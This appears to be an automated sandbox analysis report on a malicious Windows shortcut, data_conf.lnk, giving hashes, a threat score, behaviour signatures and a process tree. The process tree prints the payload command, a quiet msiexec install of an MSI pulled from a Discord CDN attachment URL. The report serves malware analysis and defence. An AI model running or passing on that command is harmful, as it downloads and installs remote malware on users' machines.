Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    27-08-2023 22:29

General

  • Target

    data_conf.lnk

  • Size

    1KB

  • MD5

    598ea8c6f5035c7f096419da69d7a92e

  • SHA1

    1e0c9b378f5f8f80bbd67c6c46acb8a174913768

  • SHA256

    fee9c51d03cebc85b04228cb3238fe994436435f20e3628b978fd2ac8d85e03e

  • SHA512

    00d868a21f9db1a280c2c8cc3188702bc604cf459ce5218e6be2419b48e48b288e42de3a1ec20bf4895e93fa6cc8d66f6723bee3743cc2977b2a3fdc808d1179

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\data_conf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1864
    • C:\Windows\System32\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i https://cdn.discordapp.com/attachments/1139130854761844741/1139155521396559954/aspose.msi /quiet
      2⤵
      • Use of msiexec (install) with remote resource
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:2804
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    PID:2772

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads